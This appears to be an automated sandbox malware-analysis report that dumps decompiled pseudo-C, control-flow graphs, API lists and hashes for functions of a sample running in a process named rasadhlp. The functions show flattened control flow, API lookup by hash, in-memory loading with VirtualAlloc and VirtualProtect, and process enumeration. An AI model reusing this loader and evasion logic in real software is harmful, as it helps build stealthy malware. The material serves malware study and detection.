                                                                                0x00323139
                                                                                0x00323147
                                                                                0x0032314b
                                                                                0x00323153
                                                                                0x0032315b
                                                                                0x00323175
                                                                                0x0032317f
                                                                                0x00323187
                                                                                0x0032318b
                                                                                0x00323193
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x00000000
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x003230ec
                                                                                0x003230e1
                                                                                0x003230d6
                                                                                0x00000000
                                                                                0x003230cb
                                                                                0x00323206
                                                                                0x00323245
                                                                                0x0032324c
                                                                                0x0032325f
                                                                                0x00323264
                                                                                0x00323264
                                                                                0x0032326b
                                                                                0x00323274
                                                                                0x0032328c
                                                                                0x0032328c
                                                                                0x00323299
                                                                                0x0032329b
                                                                                0x0032329f
                                                                                0x00000000
                                                                                0x003232a1
                                                                                0x003232a1
                                                                                0x00000000
                                                                                0x003232a1
                                                                                0x00323208
                                                                                0x0032320d
                                                                                0x003232ab
                                                                                0x003232b3
                                                                                0x003232cb
                                                                                0x003232cd
                                                                                0x003232cd
                                                                                0x003232e4
                                                                                0x003232e6
                                                                                0x003232ed
                                                                                0x003232f0
                                                                                0x003232f3
                                                                                0x00000000
                                                                                0x00323213
                                                                                0x00323218
                                                                                0x00000000
                                                                                0x0032321a
                                                                                0x00323221
                                                                                0x00323223
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x00000000
                                                                                0x003230ba
                                                                                0x003230ba
                                                                                0x00323218
                                                                                0x0032320d
                                                                                0x00000000
                                                                                0x0032322d
                                                                                0x0032322d
                                                                                0x00323242
                                                                                0x00000000
                                                                                0x00323242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00323299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 5b2c6218b68131e4fab41df7855b4e8e89ee15758e6a80fab865c4a26dffeb4e
                                                                                • Instruction ID: 41aa1ee782fecbf5b30c5e8e79d396ee1863ec7fc5a738db2bd7b6a6cc53dabb
                                                                                • Opcode Fuzzy Hash: 5b2c6218b68131e4fab41df7855b4e8e89ee15758e6a80fab865c4a26dffeb4e
                                                                                • Instruction Fuzzy Hash: A151D171B083218BC719DF6CE48556ABBEAEBD4304F20481EF452CB751DB39DA498B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00324C98, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 652 324c98-324c9f 653 324ca0-324ca5 652->653 654 324d63-324d68 653->654 655 324cab 653->655 658 324d86-324d95 654->658 659 324d6a-324d6f 654->659 656 324d24-324d2b 655->656 657 324cad-324cb2 655->657 660 324d48-324d5e 656->660 661 324d2d-324d43 call 323f00 call 323e60 656->661 662 324cb4-324cb9 657->662 663 324d1a-324d1f 657->663 658->660 666 324d97-324db2 call 323f00 call 323e60 658->666 664 324d71-324d76 659->664 665 324db4-324dbb 659->665 660->653 661->660 670 324d02-324d18 662->670 671 324cbb-324cc0 662->671 663->653 664->653 672 324d7c-324d85 664->672 668 324dd8-324dd9 CloseHandle 665->668 669 324dbd-324dd3 call 323f00 call 323e60 665->669 666->660 677 324ddb-324de4 668->677 669->668 670->653 671->664 678 324cc6-324ccd 671->678 683 324cea-324cf5 CreateToolhelp32Snapshot 678->683 684 324ccf-324ce5 call 323f00 call 323e60 678->684 683->677 687 324cfb-324d00 683->687 684->683 687->653
                                                                                C-Code - Quality: 74%
                                                                                			E00324C98(void* __eax, intOrPtr* __ebx, void* __ebp, char _a16) {
				void* _t4;
				intOrPtr* _t5;
				signed int _t6;
				int _t11;
				signed int _t16;
				intOrPtr _t19;
				intOrPtr* _t22;
				void* _t38;
				void* _t41;
				void* _t44;
				void* _t48;

				_t44 = __ebp;
				_t22 = __ebx;
				_t4 = __eax;
				goto L1;
				do {
					while(1) {
						L1:
						_t48 = _t4 - 0x29f16ba1;
						if(_t48 > 0) {
							break;
						}
						if(_t48 == 0) {
							_t5 =  *0x32e498;
							if(_t5 == 0) {
								_t5 = E00323E60(_t22, E00323F00(0x9bab0b12), 0xb6f23f63, _t44);
								 *0x32e498 = _t5;
							}
							L14:
							_t6 =  *_t5(_t41,  &_a16);
							asm("sbb eax, eax");
							_t4 = ( ~_t6 & 0xe5fc70a2) + 0x2fd2b757;
							continue;
						} else {
							if(_t4 == 0xf1114c0) {
								_t4 = 0x1f097f05;
								continue;
							} else {
								if(_t4 == 0x15cf27f9) {
									_t16 =  *_t22( &_a16, _t38);
									asm("sbb eax, eax");
									_t4 = ( ~_t16 & 0xfa1eb44a) + 0x2fd2b757;
									continue;
								} else {
									if(_t4 != 0x1f097f05) {
										goto L17;
									} else {
										_t19 =  *0x32e290; // 0x7671733f
										if(_t19 == 0) {
											 *0x32e290 = E00323E60(_t22, E00323F00(0x9bab0b12), 0xbf0ea04d, _t44);
										}
										_t11 = CreateToolhelp32Snapshot(2, 0); // executed
										_t41 = _t11;
										if(_t41 == 0xffffffff) {
											L24:
											return _t11;
										} else {
											_t4 = 0x2e0e6e55;
											continue;
										}
									}
								}
							}
						}
						L25:
					}
					if(_t4 == 0x2e0e6e55) {
						_t5 =  *0x32e1b4;
						_a16 = 0x22c;
						if(_t5 == 0) {
							_t5 = E00323E60(_t22, E00323F00(0x9bab0b12), 0x188a0580, _t44);
							 *0x32e1b4 = _t5;
						}
						goto L14;
					} else {
						if(_t4 == 0x2fd2b757) {
							if( *0x32de3c == 0) {
								 *0x32de3c = E00323E60(_t22, E00323F00(0x9bab0b12), 0x20de7595, _t44);
							}
							_t11 = CloseHandle(_t41); // executed
							goto L24;
						} else {
							goto L17;
						}
					}
					goto L25;
					L17:
				} while (_t4 != 0x9d8354f);
				return _t4;
				goto L25;
			}














                                                                                0x00324c98
                                                                                0x00324c98
                                                                                0x00324c98
                                                                                0x00324c98
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00324cab
                                                                                0x00324d24
                                                                                0x00324d2b
                                                                                0x00324d3e
                                                                                0x00324d43
                                                                                0x00324d43
                                                                                0x00324d48
                                                                                0x00324d4e
                                                                                0x00324d52
                                                                                0x00324d59
                                                                                0x00000000
                                                                                0x00324cad
                                                                                0x00324cb2
                                                                                0x00324d1a
                                                                                0x00000000
                                                                                0x00324cb4
                                                                                0x00324cb9
                                                                                0x00324d08
                                                                                0x00324d0c
                                                                                0x00324d13
                                                                                0x00000000
                                                                                0x00324cbb
                                                                                0x00324cc0
                                                                                0x00000000
                                                                                0x00324cc6
                                                                                0x00324cc6
                                                                                0x00324ccd
                                                                                0x00324ce5
                                                                                0x00324ce5
                                                                                0x00324cee
                                                                                0x00324cf0
                                                                                0x00324cf5
                                                                                0x00324ddb
                                                                                0x00324de4
                                                                                0x00324cfb
                                                                                0x00324cfb
                                                                                0x00000000
                                                                                0x00324cfb
                                                                                0x00324cf5
                                                                                0x00324cc0
                                                                                0x00324cb9
                                                                                0x00324cb2
                                                                                0x00000000
                                                                                0x00324cab
                                                                                0x00324d68
                                                                                0x00324d86
                                                                                0x00324d8b
                                                                                0x00324d95
                                                                                0x00324da8
                                                                                0x00324dad
                                                                                0x00324dad
                                                                                0x00000000
                                                                                0x00324d6a
                                                                                0x00324d6f
                                                                                0x00324dbb
                                                                                0x00324dd3
                                                                                0x00324dd3
                                                                                0x00324dd9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00324d6f
                                                                                0x00000000
                                                                                0x00324d71
                                                                                0x00324d71
                                                                                0x00324d85
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00324CEE
                                                                                • CloseHandle.KERNEL32(?,00000000,?,?), ref: 00324DD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                • String ID: ?sqv
                                                                                • API String ID: 3280610774-1358527836
                                                                                • Opcode ID: 38949bc193bf7f7b374deced70ce9a8bc188af853eca181c647f08a0363894ab
                                                                                • Instruction ID: 75d68457eb18e699c894dc1f59746346fc46d370df8b024dbdd29ccb6083a837
                                                                                • Opcode Fuzzy Hash: 38949bc193bf7f7b374deced70ce9a8bc188af853eca181c647f08a0363894ab
                                                                                • Instruction Fuzzy Hash: 4FF09231B002349ACB3BAE2C7C8673D619A6754754F260929E92ADB2F7E7208C525291
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00310580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 695 310580-3105be call 310ed0 698 3105c0-3105cf 695->698 699 3105d2-3105da 695->699 700 3105e0-3105e3 699->700 701 3106e7-3106ef 699->701 700->701 702 3105e9-3105eb 700->702 702->701 703 3105f1-3105fc 702->703 703->701 705 310602-310607 703->705 706 3106d8-3106e4 705->706 707 31060d-310629 call 311140 RtlMoveMemory 705->707 710 310654-310659 707->710 711 31062b-310630 707->711 712 31065b-31066a 710->712 713 31066c-310678 710->713 714 310643-310652 711->714 715 310632-310641 711->715 716 310679-310699 call 311140 712->716 713->716 714->716 715->716 716->701 719 31069b-3106a3 VirtualProtect 716->719 720 3106a5-3106a8 719->720 721 3106c6-3106d5 719->721 720->701 722 3106aa-3106ad 720->722 722->701 723 3106af-3106b1 722->723 723->707 724 3106b7-3106c3 723->724
                                                                                APIs
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0031061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0031069C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: 95879ccceb97e22c8759db7989ad07bf5db49c9d6942580a3fcf66631f0209b7
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 953156B365420557E32DDA69DC85BEBA3C4EBED350F08083AFA05D2280D5AED4E8C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00329DD0, Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 725 329dd0-329dde 726 329de0-329de5 725->726 727 329deb 726->727 728 329ec8-329ecd 726->728 729 329df1-329df6 727->729 730 329e89-329e90 727->730 731 329e03-329e08 728->731 732 329ed3-329ed8 728->732 733 329e16-329e26 729->733 734 329df8-329dfd 729->734 735 329e92-329ea8 call 323f00 call 323e60 730->735 736 329ead-329ec3 730->736 731->726 737 329e0a-329e15 731->737 732->726 740 329e46-329e4e 733->740 741 329e28-329e40 call 323f00 call 323e60 733->741 734->731 738 329edd-329ee4 734->738 735->736 736->726 747 329f01-329f25 738->747 748 329ee6-329efc call 323f00 call 323e60 738->748 745 329e50-329e68 call 323f00 call 323e60 740->745 746 329e6e-329e84 GetCurrentProcess QueryFullProcessImageNameW 740->746 741->740 745->746 746->726 748->747
                                                                                C-Code - Quality: 68%
                                                                                			E00329DD0(void* __ebp) {
				char _v520;
				char _v1040;
				char _v1044;
				void* __ebx;
				void* _t7;
				intOrPtr* _t9;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;

				_t45 = __ebp;
				_t7 = 0x2bf5e22e;
				goto L1;
				do {
					while(1) {
						L1:
						_t48 = _t7 - 0x282e0bc9;
						if(_t48 > 0) {
							break;
						}
						if(_t48 == 0) {
							_t9 =  *0x32e3f4;
							if(_t9 == 0) {
								_t9 = E00323E60(0, E00323F00(0x9bab0b12), 0x7dc9b9bb, _t45);
								 *0x32e3f4 = _t9;
							}
							 *_t9(0,  &_v520, 0x104);
							_t7 = 0x1d217ac5;
							continue;
						} else {
							if(_t7 == 0x1d217ac5) {
								_v1044 = 0x104;
								if( *0x32def8 == 0) {
									 *0x32def8 = E00323E60(0, E00323F00(0x9bab0b12), 0x55856f39, _t45);
								}
								_t42 =  *0x32e220;
								if(_t42 == 0) {
									_t42 = E00323E60(0, E00323F00(0x9bab0b12), 0xa63d263c, _t45);
									 *0x32e220 = _t42;
								}
								 *_t42(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
								_t7 = 0x20509b25;
								continue;
							} else {
								if(_t7 == 0x20509b25) {
									_t20 =  *0x32e05c;
									if(_t20 == 0) {
										_t20 = E00323E60(0, E00323F00(0x9bab0b12), 0xbdfcd29a, _t45);
										 *0x32e05c = _t20;
									}
									 *_t20( &_v520,  &_v1040);
									_t25 =  !=  ? 1 : 0;
									_t22 =  !=  ? 1 : 0;
									return  !=  ? 1 : 0;
								} else {
									goto L5;
								}
							}
						}
						L20:
					}
					if(_t7 != 0x2bf5e22e) {
						goto L5;
					} else {
						_t7 = 0x282e0bc9;
						goto L1;
					}
					goto L20;
					L5:
				} while (_t7 != 0x1daf8c8f);
				return 0;
				goto L20;
			}













                                                                                0x00329dd0
                                                                                0x00329dd6
                                                                                0x00329dde
                                                                                0x00329de0
                                                                                0x00329de0
                                                                                0x00329de0
                                                                                0x00329de0
                                                                                0x00329de5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00329deb
                                                                                0x00329e89
                                                                                0x00329e90
                                                                                0x00329ea3
                                                                                0x00329ea8
                                                                                0x00329ea8
                                                                                0x00329ebc
                                                                                0x00329ebe
                                                                                0x00000000
                                                                                0x00329df1
                                                                                0x00329df6
                                                                                0x00329e1c
                                                                                0x00329e26
                                                                                0x00329e40
                                                                                0x00329e40
                                                                                0x00329e46
                                                                                0x00329e4e
                                                                                0x00329e66
                                                                                0x00329e68
                                                                                0x00329e68
                                                                                0x00329e7d
                                                                                0x00329e7f
                                                                                0x00000000
                                                                                0x00329df8
                                                                                0x00329dfd
                                                                                0x00329edd
                                                                                0x00329ee4
                                                                                0x00329ef7
                                                                                0x00329efc
                                                                                0x00329efc
                                                                                0x00329f0e
                                                                                0x00329f18
                                                                                0x00329f1c
                                                                                0x00329f25
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00329dfd
                                                                                0x00329df6
                                                                                0x00000000
                                                                                0x00329deb
                                                                                0x00329ecd
                                                                                0x00000000
                                                                                0x00329ed3
                                                                                0x00329ed3
                                                                                0x00000000
                                                                                0x00329ed3
                                                                                0x00000000
                                                                                0x00329e03
                                                                                0x00329e03
                                                                                0x00329e15
                                                                                0x00000000

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 00329E7A
                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000), ref: 00329E7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentFullImageNameQuery
                                                                                • String ID:
                                                                                • API String ID: 2849609825-0
                                                                                • Opcode ID: 92edce32f199dc15677b9197c55307e9fa797e69f9ccee3c336c581b4206d51e
                                                                                • Instruction ID: 7aa5ecf475e912a994e98588d9f5a03d85b4e06f36200c5e80847de243b56b2e
                                                                                • Opcode Fuzzy Hash: 92edce32f199dc15677b9197c55307e9fa797e69f9ccee3c336c581b4206d51e
                                                                                • Instruction Fuzzy Hash: B2315672B042345BCB36EB69BCC17AE329EA790750F12442FF915CB254EA38DC068792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00310AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 763 310ad0-310b31 call 310ed0 766 310b33-310b42 763->766 767 310b47-310b4d 763->767 768 310d40 766->768 769 310b5f-310b7b 767->769 770 310b4f-310b54 767->770 772 310b90 769->772 773 310b7d-310b8e 769->773 770->769 774 310b96-310b9c 772->774 773->774 776 310bae-310bca 774->776 777 310b9e-310ba3 774->777 779 310bd7-310c21 VirtualAlloc 776->779 780 310bcc-310bd4 776->780 777->776 784 310c27-310c2e 779->784 785 310d1a-310d24 779->785 780->779 786 310c30-310c3f 784->786 787 310c44-310c4b 784->787 785->768 786->768 788 310c5d-310c79 787->788 789 310c4d-310c52 787->789 791 310c86-310c8d 788->791 792 310c7b-310c83 788->792 789->788 793 310c9f-310cbb 791->793 794 310c8f-310c94 791->794 792->791 796 310cc8-310cfa VirtualAlloc 793->796 797 310cbd-310cc5 793->797 794->793 800 310d02-310d07 796->800 797->796 800->785 801 310d09-310d18 800->801 801->768
                                                                                APIs
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                                                  • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00310BFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: ecf3428c2703a9bc2565568e3f25e0d14e6f7735c8a37d337c4523f176a6dfc7
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: FB510370640218ABDB299B54DE46FEAB7B8EF58701F004095FA08BB190D6F89DC5CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00329B60, Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 802 329b60-329b76 803 329b80-329b85 802->803 804 329b8b 803->804 805 329cef-329cf4 803->805 808 329b91-329b96 804->808 809 329c94-329cab 804->809 806 329cf6-329cfb 805->806 807 329d1f-329d26 805->807 810 329d07-329d0c 806->810 811 329cfd-329d02 806->811 814 329d43-329d50 FindFirstChangeNotificationW call 329dd0 807->814 815 329d28-329d3e call 323f00 call 323e60 807->815 812 329c1e-329c25 call 329dd0 808->812 813 329b9c-329ba1 808->813 816 329cc8-329cd9 809->816 817 329cad-329cc3 call 323f00 call 323e60 809->817 810->803 819 329d12-329d1c 810->819 811->803 837 329c63-329c6a 812->837 838 329c27-329c2f 812->838 820 329d96-329d9d 813->820 821 329ba7-329bac 813->821 825 329d55-329d57 814->825 815->814 835 329cdf-329cea 816->835 836 329dbd-329dc7 816->836 817->816 829 329dba 820->829 830 329d9f-329db5 call 323f00 call 323e60 820->830 821->810 828 329bb2-329bb9 821->828 833 329c8a-329c8f 825->833 834 329d5d-329d64 825->834 839 329bd6-329beb 828->839 840 329bbb-329bd1 call 323f00 call 323e60 828->840 829->836 830->829 833->803 846 329d81-329d91 834->846 847 329d66-329d7c call 323f00 call 323e60 834->847 835->803 844 329c87 837->844 845 329c6c-329c82 call 323f00 call 323e60 837->845 848 329c31-329c49 call 323f00 call 323e60 838->848 849 329c4f-329c5e 838->849 861 329c08-329c19 839->861 862 329bed-329c03 call 323f00 call 323e60 839->862 840->839 844->833 845->844 846->803 847->846 848->849 849->803 861->803 862->861
                                                                                C-Code - Quality: 61%
                                                                                			E00329B60() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr _t21;
				intOrPtr* _t23;
				intOrPtr* _t29;
				intOrPtr _t32;
				intOrPtr* _t36;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t45;
				intOrPtr* _t62;
				intOrPtr _t67;
				void* _t79;
				void* _t80;
				void* _t82;

				_t79 = _v528;
				_t11 = 0x35499030;
				while(1) {
					_t82 = _t11 - 0x2cee787f;
					if(_t82 > 0) {
						goto L23;
					}
					L2:
					if(_t82 == 0) {
						_t21 =  *0x32e550; // 0x54e2f8
						_t5 = _t21 + 0x14; // 0x184
						_v528 =  *_t5;
						_t23 =  *0x32e228;
						_v524 = _t79;
						if(_t23 == 0) {
							_t23 = E00323E60(_t45, E00323F00(0x9bab0b12), 0x2e50f25, _t80);
							 *0x32e228 = _t23;
						}
						_push(0xffffffff);
						_push(0);
						_push( &_v528);
						_push(2);
						if( *_t23() == 0) {
							goto L37;
						} else {
							_t11 =  ==  ? 0x66597df : 0x2cee787f;
							continue;
						}
					} else {
						if(_t11 == 0x66597df) {
							if(E00329DD0(_t80) == 0) {
								_t29 =  *0x32e138; // 0x0
								if(_t29 == 0) {
									_t29 = E00323E60(_t45, E00323F00(0x9bab0b12), 0xbc7dbdb2, _t80);
									 *0x32e138 = _t29;
								}
								 *_t29(_t79);
								L18:
								_t11 = 0x2cee787f;
							} else {
								_t62 =  *0x32df98; // 0x0
								if(_t62 == 0) {
									_t62 = E00323E60(_t45, E00323F00(0x9bab0b12), 0x6755e68d, _t80);
									 *0x32df98 = _t62;
								}
								_t32 =  *0x32e550; // 0x54e2f8
								_t4 = _t32 + 0x14; // 0x184
								 *_t62( *_t4);
								_t11 = 0x2044bfa4;
							}
							continue;
						} else {
							if(_t11 == 0x2044bfa4) {
								_t36 =  *0x32e464; // 0x0
								if(_t36 == 0) {
									_t36 = E00323E60(_t45, E00323F00(0x9bab0b12), 0x29cc148f, _t80);
									 *0x32e464 = _t36;
								}
								 *_t36(_t79);
								L37:
								return 0;
							} else {
								if(_t11 == 0x26a761c5) {
									_t39 =  *0x32e3f4;
									if(_t39 == 0) {
										_t39 = E00323E60(_t45, E00323F00(0x9bab0b12), 0x7dc9b9bb, _t80);
										 *0x32e3f4 = _t39;
									}
									 *_t39(0,  &_v520, 0x104);
									_t41 =  *0x32de18;
									if(_t41 == 0) {
										_t41 = E00323E60(_t45, E00323F00(0x55ab7d30), 0x49c1cb87, _t80);
										 *0x32de18 = _t41;
									}
									 *((short*)( *_t41( &_v532))) = 0;
									_t11 = 0x3036867a;
									continue;
									do {
										while(1) {
											_t82 = _t11 - 0x2cee787f;
											if(_t82 > 0) {
												goto L23;
											}
											goto L2;
										}
										goto L23;
									} while (_t11 != 0x1b22f57c);
									return 0;
								}
							}
						}
					}
					L38:
					L23:
					if(_t11 == 0x3036867a) {
						if( *0x32dd3c == 0) {
							 *0x32dd3c = E00323E60(_t45, E00323F00(0x9bab0b12), 0x4f6e1bf0, _t80);
						}
						_t13 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
						_t79 = _t13;
						if(E00329DD0(_t80) == 0) {
							goto L18;
						} else {
							_t15 =  *0x32df98; // 0x0
							if(_t15 == 0) {
								_t15 = E00323E60(_t45, E00323F00(0x9bab0b12), 0x6755e68d, _t80);
								 *0x32df98 = _t15;
							}
							_t67 =  *0x32e550; // 0x54e2f8
							_t10 = _t67 + 0x14; // 0x184
							 *_t15( *_t10);
							_t11 = 0x2044bfa4;
						}
						continue;
					} else {
						if(_t11 != 0x35499030) {
							goto L26;
						} else {
							_t11 = 0x26a761c5;
							continue;
						}
					}
					goto L38;
				}
			}























                                                                                0x00329b67
                                                                                0x00329b6b
                                                                                0x00329b80
                                                                                0x00329b80
                                                                                0x00329b85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00329b8b
                                                                                0x00329b8b
                                                                                0x00329c94
                                                                                0x00329c99
                                                                                0x00329c9c
                                                                                0x00329ca0
                                                                                0x00329ca5
                                                                                0x00329cab
                                                                                0x00329cbe
                                                                                0x00329cc3
                                                                                0x00329cc3
                                                                                0x00329cc8
                                                                                0x00329cca
                                                                                0x00329cd0
                                                                                0x00329cd1
                                                                                0x00329cd9
                                                                                0x00000000
                                                                                0x00329cdf
                                                                                0x00329ce7
                                                                                0x00000000
                                                                                0x00329ce7
                                                                                0x00329b91
                                                                                0x00329b96
                                                                                0x00329c25
                                                                                0x00329c63
                                                                                0x00329c6a
                                                                                0x00329c7d
                                                                                0x00329c82
                                                                                0x00329c82
                                                                                0x00329c88
                                                                                0x00329c8a
                                                                                0x00329c8a
                                                                                0x00329c27
                                                                                0x00329c27
                                                                                0x00329c2f
                                                                                0x00329c47
                                                                                0x00329c49
                                                                                0x00329c49
                                                                                0x00329c4f
                                                                                0x00329c54
                                                                                0x00329c57
                                                                                0x00329c59
                                                                                0x00329c59
                                                                                0x00000000
                                                                                0x00329b9c
                                                                                0x00329ba1
                                                                                0x00329d96
                                                                                0x00329d9d
                                                                                0x00329db0
                                                                                0x00329db5
                                                                                0x00329db5
                                                                                0x00329dbb
                                                                                0x00329dbe
                                                                                0x00329dc7
                                                                                0x00329ba7
                                                                                0x00329bac
                                                                                0x00329bb2
                                                                                0x00329bb9
                                                                                0x00329bcc
                                                                                0x00329bd1
                                                                                0x00329bd1
                                                                                0x00329be2
                                                                                0x00329be4
                                                                                0x00329beb
                                                                                0x00329bfe
                                                                                0x00329c03
                                                                                0x00329c03
                                                                                0x00329c11
                                                                                0x00329c14
                                                                                0x00329c19
                                                                                0x00329b80
                                                                                0x00329b80
                                                                                0x00329b80
                                                                                0x00329b85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00329b85
                                                                                0x00000000
                                                                                0x00329b80
                                                                                0x00329d1c
                                                                                0x00329d1c
                                                                                0x00329bac
                                                                                0x00329ba1
                                                                                0x00329b96
                                                                                0x00000000
                                                                                0x00329cef
                                                                                0x00329cf4
                                                                                0x00329d26
                                                                                0x00329d3e
                                                                                0x00329d3e
                                                                                0x00329d4c
                                                                                0x00329d4e
                                                                                0x00329d57
                                                                                0x00000000
                                                                                0x00329d5d
                                                                                0x00329d5d
                                                                                0x00329d64
                                                                                0x00329d77
                                                                                0x00329d7c
                                                                                0x00329d7c
                                                                                0x00329d81
                                                                                0x00329d87
                                                                                0x00329d8a
                                                                                0x00329d8c
                                                                                0x00329d8c
                                                                                0x00000000
                                                                                0x00329cf6
                                                                                0x00329cfb
                                                                                0x00000000
                                                                                0x00329cfd
                                                                                0x00329cfd
                                                                                0x00000000
                                                                                0x00329cfd
                                                                                0x00329cfb
                                                                                0x00000000
                                                                                0x00329cf4

                                                                                APIs
                                                                                • FindFirstChangeNotificationW.KERNEL32(?,00000000,00000001), ref: 00329D4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
